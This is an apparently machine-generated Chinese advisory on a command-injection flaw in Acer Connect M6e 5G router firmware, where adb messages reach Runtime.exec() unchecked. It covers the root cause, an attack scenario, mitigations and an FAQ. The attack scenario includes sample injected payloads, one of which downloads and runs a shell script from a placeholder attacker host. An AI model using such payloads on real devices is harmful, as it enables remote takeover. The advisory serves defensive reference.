CVE-2026-49185 (CVSS 9.8) - The FieldX MDM adb messaging topic passes unverified payloads directly into Runt
CVE-2026-49185 是 Acer Connect M6e 5G 路由器固件中的严重命令注入漏洞(CVSS 9.8)。FieldX MDM的adb消息未验证输入直接传递给Runtime.exec(),攻击者可远程执行任意命令造成完全设备接管。本文提供技术分析、攻击场景和修复建议。
CVE-2026-49185 (CVSS 9.8) - The FieldX MDM adb messaging topic passes unverified payloads directly into Runt
📋 漏洞概述
Acer Connect M6e 5G 路由器固件存在命令注入漏洞,攻击者可通过adb消息传递未验证载荷导致远程代码执行。
📋 基础信息
| 受影响版本 | acer connect_m6e_5g_firmware (所有版本), acer connect_m6e_5g 硬件设备 |
| 漏洞类型 | 命令注入 (Command Injection) |
| CVSS | 9.8 · Critical |
| CVE | CVE-2026-49185 |
🔬 漏洞根因
FieldX MDM (移动设备管理) 的 adb 消息主题在处理传入消息时,未对载荷进行任何验证或过滤,直接将用户可控的字符串拼接并传递给 Runtime.exec() 方法。这允许攻击者通过adb协议发送包含恶意shell命令的payload,导致任意操作系统命令执行。由于adb协议常用于设备管理且默认可能开启,攻击者无需身份认证即可触发。
🎯 攻击场景
1. 前提:攻击者与目标Acer Connect M6e 5G设备处于同一网络段,或设备adb服务暴露在公网(默认可能开启)。 2. 攻击者构造一个特制的adb消息,载荷中包含恶意命令,例如 '; reboot' 或者 '&& wget http://attacker/payload.sh && sh payload.sh'。 3. 攻击者通过adb协议将该消息发送至FieldX MDM的adb消息主题。 4. 设备上的FieldX MDM组件接收到消息后,未作校验直接调用 Runtime.exec() 执行该字符串,触发命令执行。 5. 成功标志:攻击者在设备上获得任意命令执行能力,可植入后门、提取敏感数据或完全控制设备。
💥 漏洞影响
远程未经身份验证的攻击者可以在目标设备上以系统权限执行任意命令,实现完全远程代码执行(RCE)。这可能导致设备被完全控制、数据泄露、用作僵尸网络节点或内网跳板。
🛡️ 修复建议
升级固件至厂商推送的安全版本;临时缓解措施:在防火墙中阻止从外部网络访问adb端口(默认TCP 5555),并在设备设置中禁用adb调试功能(若可配置)。
📎 参考链接
- https://nvd.nist.gov/vuln/detail/CVE-2026-49185
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-49185
- 原始来源(NVD-Latest)
🚨 威胁评估
| 📈 EPSS 利用概率 | 低 (0.1%) (高于 16.7% 的漏洞) |
| 🚨 CISA KEV | 未被已知利用 |
| 🔧 公开 PoC | 暂无公开 PoC |
⚠️ 本文由漏洞情报系统自动生成,仅供安全研究与防御参考。生成时间: 2026-06-06 08:09 | 来源: NVD-Latest
🤖 常见问题解答(FAQ)
❓ 如何检测设备是否受此漏洞影响?
检查设备是否开启adb服务(默认端口5555),并使用adb shell命令尝试连接,若能直接进入shell则可能受影响;也可查看固件版本是否在厂商公告的受影响列表内。
❓ 攻击需要什么网络条件?
攻击者需与目标设备网络可达;若adb暴露于公网,远程攻击者可直接利用;若仅在局域网,需先渗透进入该网络。
❓ 此漏洞是否可以造成持久化后门?
可以。攻击者利用命令注入写入持久化脚本或修改启动项,在设备重启后仍能保持控制。